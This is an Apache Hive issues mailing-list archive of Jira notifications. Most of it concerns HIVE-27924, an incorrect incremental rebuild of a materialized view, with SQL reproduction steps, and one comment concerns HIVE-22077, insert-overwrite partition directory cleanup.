[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Description: 
h1. Summary

The incremental rebuild plan and execution output are incorrect when one side 
of the table join has inserted/deleted join keys that the other side has 
deleted/inserted (note the order).

The argument is that tuples that have never been present simultaneously should 
not interact with one another, i.e., one's inserts should not join the other's 
deletes.
h1. Related Test Case

The bug was discovered during replication of the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:sql}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set hive.materializedview.rewriting=true;{code}
 # 
{code:sql}
create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}
 # 
{code:sql}
insert into cmv_basetable_n6 values
(1, 'alfred', 10.30, 2),
(1, 'charlie', 20.30, 2); {code}
 # 
{code:sql}
create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}
 # 
{code:sql}
insert into cmv_basetable_2_n3 values
(1, 'bob', 30.30, 2),
(1, 'bonnie', 40.30, 2);{code}
 # 
{code:sql}
CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') 
AS
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
 # 
{code:sql}
show tables; {code}
!截图.PNG!
 # Select tuples, including deletion and with VirtualColumn's, from the MV and 
source tables. We see that the MV is correctly built upon creation:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图1.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图2.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图3.PNG!
 # Now make an insert to the LHS and a delete to the RHS source table:
{code:sql}
insert into cmv_basetable_n6 values
(1, 'kevin', 50.30, 2);

DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}
 # Select again to see what happened:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图4.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图5.PNG!
 # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
which is incorrect already:
{code:sql}
EXPLAIN CBO
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
!截图6.PNG!
 # Rebuild MV and see (incorrect) results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;

SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图7.PNG!
 # Run MV definition directly, which outputs incorrect results because the MV 
is enabled for MV-based query rewrite, i.e., the following query will output 
what's in the MV for the time being:
{code:sql}
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0; {code}
!截图8.PNG!
 # Disable MV-based query rewrite for the MV and re-run the definition, which 
should give the correct results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;

SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
!截图9.PNG!

h1. Note

This issue is also seen in update-incurred inserts/deletes.

  was:
h1. Summary

The incremental rebuild plan and execution output are incorrect when one side 
of the table join has inserted/deleted join keys that the other side has 
deleted/inserted (note the order).


The argument is that tuples that have never been present simultaneously should 
not interact with one another, i.e., one's inserts should not join the other's 
deletes.
h1. Related Test Case

The bug was discovered during replication of the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:java}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set 

[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Attachment: 截图9.PNG

> Incremental rebuild goes wrong when inserts and deletes overlap between the 
> source tables
> -
>
> Key: HIVE-27924
> URL: https://issues.apache.org/jira/browse/HIVE-27924
> Project: Hive
>  Issue Type: Bug
>  Components: Materialized views
>Affects Versions: 4.0.0-beta-1
> Environment: * Docker version : 19.03.6
>  * Hive version : 4.0.0-beta-1
>  * Driver version : Hive JDBC (4.0.0-beta-1)
>  * Beeline version : 4.0.0-beta-1
>Reporter: Wenhao Li
>Priority: Critical
>  Labels: bug, hive, materializedviews
> Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
> 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
>
>
> h1. Summary
> The incremental rebuild plan and execution output are incorrect when one side 
> of the table join has inserted/deleted join keys that the other side has 
> deleted/inserted (note the order).
> The argument is that tuples that have never been present simultaneously 
> should not interact with one another, i.e., one's inserts should not join the 
> other's deletes.
> h1. Related Test Case
> The bug was discovered during replication of the test case:
> ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
> h1. Steps to Reproduce the Issue
>  # Configurations:
> {code:java}
> SET hive.vectorized.execution.enabled=false;
> set hive.support.concurrency=true;
> set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
> set hive.strict.checks.cartesian.product=false;
> set hive.materializedview.rewriting=true;{code}
>  # 
> {code:java}
> create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
> stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'alfred', 10.30, 2),
> (1, 'charlie', 20.30, 2); {code}
>  # 
> {code:java}
> create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d 
> int) stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_2_n3 values
> (1, 'bob', 30.30, 2),
> (1, 'bonnie', 40.30, 2);{code}
>  # 
> {code:java}
> CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES 
> ('transactional'='true') AS
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> cmv_basetable_2_n3.a)
> WHERE cmv_basetable_2_n3.c > 10.0;{code}
>  # 
> {code:java}
> show tables; {code}
> !截图.PNG!
>  # Select tuples, including deletion and with VirtualColumn's, from the MV 
> and source tables. We see that the MV is correctly built upon creation:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
> !截图1.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
> !截图2.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
> !截图3.PNG!
>  # Now make an insert to the LHS and a delete to the RHS source table:
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'kevin', 50.30, 2);
> DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}
>  # Select again to see what happened:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
> !截图4.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
> !截图5.PNG!
>  # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
> which is incorrect already:
> {code:java}
> EXPLAIN CBO
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
> !截图6.PNG!
>  # Rebuild MV and see (incorrect) results:
> {code:java}
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
> !截图7.PNG!
>  # Run MV definition directly, which outputs incorrect results because the MV 
> is enabled for MV-based query rewrite, i.e., the following query will output 
> what's in the MV for the time being:
> {code:java}
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> cmv_basetable_2_n3.a)
> WHERE cmv_basetable_2_n3.c > 10.0; {code}
> !截图8.PNG!
>  # Disable MV-based query rewrite for the MV and re-run the definition, which 
> should give the correct results:
> {code:java}
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;
> SELECT cmv_basetable_n6.a, 

[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Attachment: (was: 截图9.PNG)

> Incremental rebuild goes wrong when inserts and deletes overlap between the 
> source tables
> -
>
> Key: HIVE-27924
> URL: https://issues.apache.org/jira/browse/HIVE-27924
> Project: Hive
>  Issue Type: Bug
>  Components: Materialized views
>Affects Versions: 4.0.0-beta-1
> Environment: * Docker version : 19.03.6
>  * Hive version : 4.0.0-beta-1
>  * Driver version : Hive JDBC (4.0.0-beta-1)
>  * Beeline version : 4.0.0-beta-1
>Reporter: Wenhao Li
>Priority: Critical
>  Labels: bug, hive, materializedviews
> Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
> 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
>
>
> h1. Summary
> The incremental rebuild plan and execution output are incorrect when one side 
> of the table join has inserted/deleted join keys that the other side has 
> deleted/inserted (note the order).
> The argument is that tuples that have never been present simultaneously 
> should not interact with one another, i.e., one's inserts should not join the 
> other's deletes.
> h1. Related Test Case
> The bug was discovered during replication of the test case:
> ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
> h1. Steps to Reproduce the Issue
>  # Configurations:
> {code:java}
> SET hive.vectorized.execution.enabled=false;
> set hive.support.concurrency=true;
> set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
> set hive.strict.checks.cartesian.product=false;
> set hive.materializedview.rewriting=true;{code}
>  # 
> {code:java}
> create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
> stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'alfred', 10.30, 2),
> (1, 'charlie', 20.30, 2); {code}
>  # 
> {code:java}
> create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d 
> int) stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_2_n3 values
> (1, 'bob', 30.30, 2),
> (1, 'bonnie', 40.30, 2);{code}
>  # 
> {code:java}
> CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES 
> ('transactional'='true') AS
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> cmv_basetable_2_n3.a)
> WHERE cmv_basetable_2_n3.c > 10.0;{code}
>  # 
> {code:java}
> show tables; {code}
> !截图.PNG!
>  # Select tuples, including deletion and with VirtualColumn's, from the MV 
> and source tables. We see that the MV is correctly built upon creation:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
> !截图1.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
> !截图2.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
> !截图3.PNG!
>  # Now make an insert to the LHS and a delete to the RHS source table:
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'kevin', 50.30, 2);
> DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}
>  # Select again to see what happened:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
> !截图4.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
> !截图5.PNG!
>  # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
> which is incorrect already:
> {code:java}
> EXPLAIN CBO
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
> !截图6.PNG!
>  # Rebuild MV and see (incorrect) results:
> {code:java}
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
> !截图7.PNG!
>  # Run MV definition directly, which outputs incorrect results because the MV 
> is enabled for MV-based query rewrite, i.e., the following query will output 
> what's in the MV for the time being:
> {code:java}
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> cmv_basetable_2_n3.a)
> WHERE cmv_basetable_2_n3.c > 10.0; {code}
> !截图8.PNG!
>  # Disable MV-based query rewrite for the MV and re-run the definition, which 
> should give the correct results:
> {code:java}
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;
> SELECT cmv_basetable_n6.a, 

[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Description: 
h1. Summary

The incremental rebuild plan and execution output are incorrect when one side 
of the table join has inserted/deleted join keys that the other side has 
deleted/inserted (note the order).


The argument is that tuples that have never been present simultaneously should 
not interact with one another, i.e., one's inserts should not join the other's 
deletes.
h1. Related Test Case

The bug was discovered during replication of the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:java}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set hive.materializedview.rewriting=true;{code}

 # 
{code:java}
create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}

 # 
{code:java}
insert into cmv_basetable_n6 values
(1, 'alfred', 10.30, 2),
(1, 'charlie', 20.30, 2); {code}

 # 
{code:java}
create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}

 # 
{code:java}
insert into cmv_basetable_2_n3 values
(1, 'bob', 30.30, 2),
(1, 'bonnie', 40.30, 2);{code}

 # 
{code:java}
CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') 
AS
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}

 # 
{code:java}
show tables; {code}
!截图.PNG!

 # Select tuples, including deletion and with VirtualColumn's, from the MV and 
source tables. We see that the MV is correctly built upon creation:
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图1.PNG!

 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图2.PNG!

 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图3.PNG!

 # Now make an insert to the LHS and a delete to the RHS source table:
{code:java}
insert into cmv_basetable_n6 values
(1, 'kevin', 50.30, 2);

DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}

 # Select again to see what happened:
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图4.PNG!

 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图5.PNG!

 # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
which is incorrect already:
{code:java}
EXPLAIN CBO
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
!截图6.PNG!

 # Rebuild MV and see (incorrect) results:
{code:java}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;

SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图7.PNG!

 # Run MV definition directly, which outputs incorrect results because the MV 
is enabled for MV-based query rewrite, i.e., the following query will output 
what's in the MV for the time being:
{code:java}
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0; {code}
!截图8.PNG!

 # Disable MV-based query rewrite for the MV and re-run the definition, which 
should give the correct results:
{code:java}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;

SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
!截图9.PNG!

h1. Note

This issue is also seen in update-incurred inserts/deletes.

  was:
h1. Summary

The incremental rebuild plan and execution output are incorrect when one side 
of the table join has inserted/deleted join keys that the other side has 
deleted/inserted (note the order).
The argument is that tuples that have never been present simultaneously should 
not interact with one another, i.e., one's inserts should not join the other's 
deletes.
h1. Related Test Case

The bug was discovered during replication of the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:java}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set 

[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Environment: 
* Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1

  was:
h1. Software Env.
 * Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1


> Incremental rebuild goes wrong when inserts and deletes overlap between the 
> source tables
> -
>
> Key: HIVE-27924
> URL: https://issues.apache.org/jira/browse/HIVE-27924
> Project: Hive
>  Issue Type: Bug
>  Components: Materialized views
>Affects Versions: 4.0.0-beta-1
> Environment: * Docker version : 19.03.6
>  * Hive version : 4.0.0-beta-1
>  * Driver version : Hive JDBC (4.0.0-beta-1)
>  * Beeline version : 4.0.0-beta-1
>Reporter: Wenhao Li
>Priority: Critical
>  Labels: bug, hive, materializedviews
> Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
> 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
>
>
> h1. Summary
> The incremental rebuild plan and execution output are incorrect when one side 
> of the table join has inserted/deleted join keys that the other side has 
> deleted/inserted (note the order).
> The argument is that tuples that have never been present simultaneously 
> should not interact with one another, i.e., one's inserts should not join the 
> other's deletes.
> h1. Related Test Case
> The bug was discovered during replication of the test case:
> ??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
> h1. Steps to Reproduce the Issue
>  # Configurations:
> {code:java}
> SET hive.vectorized.execution.enabled=false;
> set hive.support.concurrency=true;
> set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
> set hive.strict.checks.cartesian.product=false;
> set hive.materializedview.rewriting=true;{code}
>  # 
> {code:java}
> create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
> stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'alfred', 10.30, 2),
> (1, 'charlie', 20.30, 2); {code}
>  # 
> {code:java}
> create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d 
> int) stored as orc TBLPROPERTIES ('transactional'='true'); {code}
>  # 
> {code:java}
> insert into cmv_basetable_2_n3 values
> (1, 'bob', 30.30, 2),
> (1, 'bonnie', 40.30, 2);{code}
>  # 
> {code:java}
> CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES 
> ('transactional'='true') AS
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> cmv_basetable_2_n3.a)
> WHERE cmv_basetable_2_n3.c > 10.0;{code}
>  # 
> {code:java}
> show tables; {code}
>  !截图.PNG!
>  # Select tuples, including deletion and with VirtualColumn's, from the MV 
> and source tables. We see that the MV is correctly built upon creation:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
>  !截图1.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
>  !截图2.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
>  !截图3.PNG!
>  # Now make an insert to the LHS and a delete to the RHS source table:
> {code:java}
> insert into cmv_basetable_n6 values
> (1, 'kevin', 50.30, 2);
> DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}
>  # Select again to see what happened:
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
>  !截图4.PNG!
>  # 
> {code:java}
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
>  !截图5.PNG!
>  # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
> which is incorrect already:
> {code:java}
> EXPLAIN CBO
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
>  !截图6.PNG!
>  # Rebuild MV and see (incorrect) results:
> {code:java}
> ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;
> SELECT ROW__IS__DELETED, ROW__ID, * FROM 
> cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
>  !截图7.PNG!
>  # Run MV definition directly, which outputs incorrect results because the MV 
> is enabled for MV-based query rewrite, i.e., the following query will output 
> what's in the MV for the time being:
> {code:java}
> SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
> FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
> 

[jira] [Commented] (HIVE-22077) Inserting overwrite partitions clause does not clean directories while partitions' info is not stored in metadata

2023-11-30 Thread Kiran Velumuri (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-22077?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791918#comment-17791918
 ] 

Kiran Velumuri commented on HIVE-22077:
---

[~Bone An] I see that this issue has been inactive for a long time. In case you 
are not working on this, can I pick this up? Thanks.

> Inserting overwrite partitions clause does not clean directories while 
> partitions' info is not stored in metadata
> -
>
> Key: HIVE-22077
> URL: https://issues.apache.org/jira/browse/HIVE-22077
> Project: Hive
>  Issue Type: Bug
>  Components: Hive
>Affects Versions: 1.1.1, 2.3.4, 4.0.0
>Reporter: Hui An
>Assignee: Hui An
>Priority: Major
> Attachments: HIVE-22077.patch.1
>
>
> Inserting overwrite static partitions may not clean related HDFS location if 
> partitions' info is not stored in metadata.
> Steps to reproduce this issue : 
> 
> 1. Create a managed table :
> 
> {code:sql}
>  CREATE TABLE `test`(   
>`id` string) 
>  PARTITIONED BY (   
>`dayno` string)  
>  ROW FORMAT SERDE   
>'org.apache.hadoop.hive.ql.io.orc.OrcSerde'  
>  STORED AS INPUTFORMAT  
>'org.apache.hadoop.hive.ql.io.orc.OrcInputFormat'  
>  OUTPUTFORMAT   
>'org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat' 
>  LOCATION   
>'hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test' 
>  TBLPROPERTIES (
>'transient_lastDdlTime'='1564731656')   
> {code}
> 
> 2. Create partition's directory and put some data in it
> 
> {code:java}
> hdfs dfs -mkdir 
> hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> hdfs dfs -put test.data 
> hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> {code}
> 
> 3. Insert overwrite partition dayno=20190802
> 
> {code:sql}
> INSERT OVERWRITE TABLE test PARTITION(dayno='20190802')
> SELECT "some value";
> {code}
> 
> 4. We could see the test.data under partition directory is not deleted.
> 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)
Wenhao Li created HIVE-27924:


 Summary: Incremental rebuild goes wrong when inserts and deletes 
overlap between the source tables
 Key: HIVE-27924
 URL: https://issues.apache.org/jira/browse/HIVE-27924
 Project: Hive
  Issue Type: Bug
  Components: Materialized views
Affects Versions: 4.0.0-beta-1
 Environment: h1. Software Env.
 * Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1
Reporter: Wenhao Li
 Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG

h1. Summary

The incremental rebuild plan and execution output are incorrect when one side 
of the table join has inserted/deleted join keys that the other side has 
deleted/inserted (note the order).
The argument is that tuples that have never been present simultaneously should 
not interact with one another, i.e., one's inserts should not join the other's 
deletes.
h1. Related Test Case

The bug was discovered during replication of the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:java}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set hive.materializedview.rewriting=true;{code}

 # 
{code:java}
create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}

 # 
{code:java}
insert into cmv_basetable_n6 values
(1, 'alfred', 10.30, 2),
(1, 'charlie', 20.30, 2); {code}

 # 
{code:java}
create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}

 # 
{code:java}
insert into cmv_basetable_2_n3 values
